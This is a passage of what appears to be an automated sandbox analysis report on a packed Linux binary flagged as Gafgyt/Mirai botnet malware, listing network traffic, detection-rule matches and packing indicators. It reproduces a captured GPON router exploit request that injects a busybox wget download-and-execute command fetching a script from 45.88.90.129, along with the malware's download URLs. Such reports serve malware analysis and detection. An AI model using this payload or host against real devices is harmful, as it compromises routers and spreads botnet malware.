Source: unknown Network traffic detected: HTTP traffic on port 52780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40500
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40982
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48468
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47136
Source: unknown Network traffic detected: HTTP traffic on port 35152 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60910 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44946 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 46288
Source: unknown Network traffic detected: HTTP traffic on port 59732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49570 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54720
Source: unknown Network traffic detected: HTTP traffic on port 55918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50364
Source: unknown Network traffic detected: HTTP traffic on port 53234 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37332
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54724
Source: unknown Network traffic detected: HTTP traffic on port 43162 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60618 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50368
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51212
Source: unknown Network traffic detected: HTTP traffic on port 58390 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40976
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60166
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35154
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35152
Source: unknown Network traffic detected: HTTP traffic on port 47724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 40084 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32948
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32944
Source: unknown Network traffic detected: HTTP traffic on port 59114 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48050
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52952
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59598
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59114
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58266
Source: unknown Network traffic detected: HTTP traffic on port 60324 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42748
Source: unknown Network traffic detected: HTTP traffic on port 53848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42744
Source: unknown Network traffic detected: HTTP traffic on port 48932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41890
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53818
Source: unknown Network traffic detected: HTTP traffic on port 48502 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51466 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48044
Source: unknown Network traffic detected: HTTP traffic on port 41328 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57194 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54650 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39526 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49372
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32930
Source: unknown Network traffic detected: HTTP traffic on port 40072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37398
Source: unknown Network traffic detected: HTTP traffic on port 42434 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 47454 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60100
Source: unknown Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42736
Source: unknown Network traffic detected: HTTP traffic on port 44246 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60108
Source: unknown Network traffic detected: HTTP traffic on port 59102 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50476 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60104
Source: unknown Network traffic detected: HTTP traffic on port 59588 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37382
Source: unknown Network traffic detected: HTTP traffic on port 55722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38232
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47184
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39562
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48030
Source: unknown Network traffic detected: HTTP traffic on port 36886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38236
Source: unknown Network traffic detected: HTTP traffic on port 56998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42340 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39566
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50310
Source: unknown Network traffic detected: HTTP traffic on port 49078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60114
Source: unknown Network traffic detected: HTTP traffic on port 40842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57346 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56512 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 40490 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59130
Source: unknown Network traffic detected: HTTP traffic on port 38806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48026
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52504
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51650
Source: unknown Network traffic detected: HTTP traffic on port 53034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53832
Source: unknown Network traffic detected: HTTP traffic on port 50488 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 45630 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53210 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35194
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40534
Source: unknown Network traffic detected: HTTP traffic on port 60254 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58290
Source: unknown Network traffic detected: HTTP traffic on port 51536 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51278 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42670
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53328
Source: unknown Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 47928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43600 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39288 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40490
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54654
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53322
Source: unknown Network traffic detected: HTTP traffic on port 44892 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48612 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55504
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32862
Source: unknown Network traffic detected: HTTP traffic on port 37382 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48314 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 40334 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 47482 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 47860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 47184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44844
Source: unknown Network traffic detected: HTTP traffic on port 35016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43514
Source: unknown Network traffic detected: HTTP traffic on port 49640 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43510
Source: unknown Network traffic detected: HTTP traffic on port 34780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39490
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56848
Source: unknown Network traffic detected: HTTP traffic on port 46386 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37438 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51156
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33702
Source: unknown Network traffic detected: HTTP traffic on port 41808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55510
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53336
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52004
Source: unknown Network traffic detected: HTTP traffic on port 33924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56850
Source: unknown Network traffic detected: HTTP traffic on port 39448 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41328
Source: unknown Network traffic detected: HTTP traffic on port 50812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41324
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41326
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40472
Source: unknown Network traffic detected: HTTP traffic on port 56486 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43982
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42650
Source: unknown Network traffic detected: HTTP traffic on port 51954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 32930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51438 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56532 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55524
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54676
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53344
Source: unknown Network traffic detected: HTTP traffic on port 37128 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48350 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39008
Source: unknown Network traffic detected: HTTP traffic on port 36584 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53346
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51170
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42648
Source: unknown Network traffic detected: HTTP traffic on port 60798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 41890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41312
Source: unknown Network traffic detected: HTTP traffic on port 56164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43976
Source: unknown Network traffic detected: HTTP traffic on port 36296 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41310
Source: unknown Network traffic detected: HTTP traffic on port 45450 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39470
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37294
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53354
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38146
Source: unknown Network traffic detected: HTTP traffic on port 34390 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47094
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57710
Source: unknown Network traffic detected: HTTP traffic on port 35282 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38148
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54688
Source: unknown Network traffic detected: HTTP traffic on port 42344 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51180
Source: unknown Network traffic detected: HTTP traffic on port 33340 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55540
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56872
Source: unknown Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57158 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37426 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 33178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40450
Source: unknown Network traffic detected: HTTP traffic on port 34620 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 40608 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35692 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 45474 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 32978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44892
Source: unknown Network traffic detected: HTTP traffic on port 36960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39066
Source: unknown Network traffic detected: HTTP traffic on port 48224 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 46226 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 178.74.62.101
Source: unknown TCP traffic detected without corresponding DNS query: 178.132.182.18
Source: unknown TCP traffic detected without corresponding DNS query: 79.139.187.101
Source: unknown TCP traffic detected without corresponding DNS query: 109.109.240.100
Source: unknown TCP traffic detected without corresponding DNS query: 42.66.31.119
Source: unknown TCP traffic detected without corresponding DNS query: 5.219.231.64
Source: unknown TCP traffic detected without corresponding DNS query: 178.66.21.70
Source: unknown TCP traffic detected without corresponding DNS query: 118.96.153.97
Source: unknown TCP traffic detected without corresponding DNS query: 94.171.202.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.74.62.101
Source: unknown TCP traffic detected without corresponding DNS query: 212.24.48.34
Source: unknown TCP traffic detected without corresponding DNS query: 2.55.124.208
Source: unknown TCP traffic detected without corresponding DNS query: 118.93.103.238
Source: unknown TCP traffic detected without corresponding DNS query: 79.139.187.101
Source: unknown TCP traffic detected without corresponding DNS query: 94.30.94.177
Source: unknown TCP traffic detected without corresponding DNS query: 37.14.68.106
Source: unknown TCP traffic detected without corresponding DNS query: 79.124.184.24
Source: unknown TCP traffic detected without corresponding DNS query: 5.52.217.16
Source: unknown TCP traffic detected without corresponding DNS query: 109.97.25.145
Source: unknown TCP traffic detected without corresponding DNS query: 79.211.161.184
Source: unknown TCP traffic detected without corresponding DNS query: 2.216.216.207
Source: unknown TCP traffic detected without corresponding DNS query: 178.58.175.210
Source: unknown TCP traffic detected without corresponding DNS query: 79.126.198.194
Source: unknown TCP traffic detected without corresponding DNS query: 5.93.246.198
Source: unknown TCP traffic detected without corresponding DNS query: 94.161.51.87
Source: unknown TCP traffic detected without corresponding DNS query: 79.133.25.162
Source: unknown TCP traffic detected without corresponding DNS query: 42.136.41.130
Source: unknown TCP traffic detected without corresponding DNS query: 42.1.182.134
Source: unknown TCP traffic detected without corresponding DNS query: 118.138.116.89
Source: unknown TCP traffic detected without corresponding DNS query: 42.35.0.16
Source: unknown TCP traffic detected without corresponding DNS query: 118.93.103.238
Source: unknown TCP traffic detected without corresponding DNS query: 79.229.115.91
Source: unknown TCP traffic detected without corresponding DNS query: 37.175.78.121
Source: unknown TCP traffic detected without corresponding DNS query: 79.59.198.239
Source: unknown TCP traffic detected without corresponding DNS query: 79.90.28.172
Source: unknown TCP traffic detected without corresponding DNS query: 2.55.124.208
Source: unknown TCP traffic detected without corresponding DNS query: 5.52.217.16
Source: unknown TCP traffic detected without corresponding DNS query: 79.103.225.226
Source: unknown TCP traffic detected without corresponding DNS query: 37.14.68.106
Source: unknown TCP traffic detected without corresponding DNS query: 212.24.48.34
Source: unknown TCP traffic detected without corresponding DNS query: 5.170.90.161
Source: unknown TCP traffic detected without corresponding DNS query: 94.99.39.74
Source: unknown TCP traffic detected without corresponding DNS query: 2.248.144.246
Source: unknown TCP traffic detected without corresponding DNS query: 79.133.25.162
Source: unknown TCP traffic detected without corresponding DNS query: 94.187.166.180
Source: unknown TCP traffic detected without corresponding DNS query: 42.199.12.156
Source: unknown TCP traffic detected without corresponding DNS query: 118.44.90.188
Source: unknown TCP traffic detected without corresponding DNS query: 37.107.160.229
Source: unknown TCP traffic detected without corresponding DNS query: 79.126.198.194
Source: unknown TCP traffic detected without corresponding DNS query: 79.176.233.236
Source: 5OGAx17mRN.elf, 5808.1.00007f164c017000.00007f164c02d000.r-x.sdmp, 5OGAx17mRN.elf, 5810.1.00007f164c017000.00007f164c02d000.r-x.sdmp, 5OGAx17mRN.elf, 5815.1.00007f164c017000.00007f164c02d000.r-x.sdmp String found in binary or memory: http://45.88.90.129/bins/Rakitin.mips%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: 5OGAx17mRN.elf, 5815.1.00007f164c017000.00007f164c02d000.r-x.sdmp String found in binary or memory: http://45.88.90.129/bins/Rakitin.sh
Source: 5OGAx17mRN.elf String found in binary or memory: http://upx.sf.net
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 34 35 2e 38 38 2e 39 30 2e 31 32 39 2f 62 69 6e 73 2f 52 61 6b 69 74 69 6e 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.88.90.129/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0

System Summary

barindex
Source: 5810.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 5810.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5808.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 5808.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5815.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 5815.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: Process Memory Space: 5OGAx17mRN.elf PID: 5808, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: 5OGAx17mRN.elf PID: 5810, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: 5OGAx17mRN.elf PID: 5815, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: LOAD without section mappings Program segment: 0x8000
Source: 5810.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 5810.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5808.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 5808.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5815.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 5815.1.00007f164c017000.00007f164c02d000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: Process Memory Space: 5OGAx17mRN.elf PID: 5808, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: 5OGAx17mRN.elf PID: 5810, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: 5OGAx17mRN.elf PID: 5815, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: classification engine Classification label: mal72.troj.evad.linELF@0/0@2/0

Data Obfuscation

barindex
Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 43974
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 43978
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 43998
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44002
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44004
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44008
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44010
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44018
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44020
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44026
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44028
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44170
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44174
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44178
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44182
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 38140
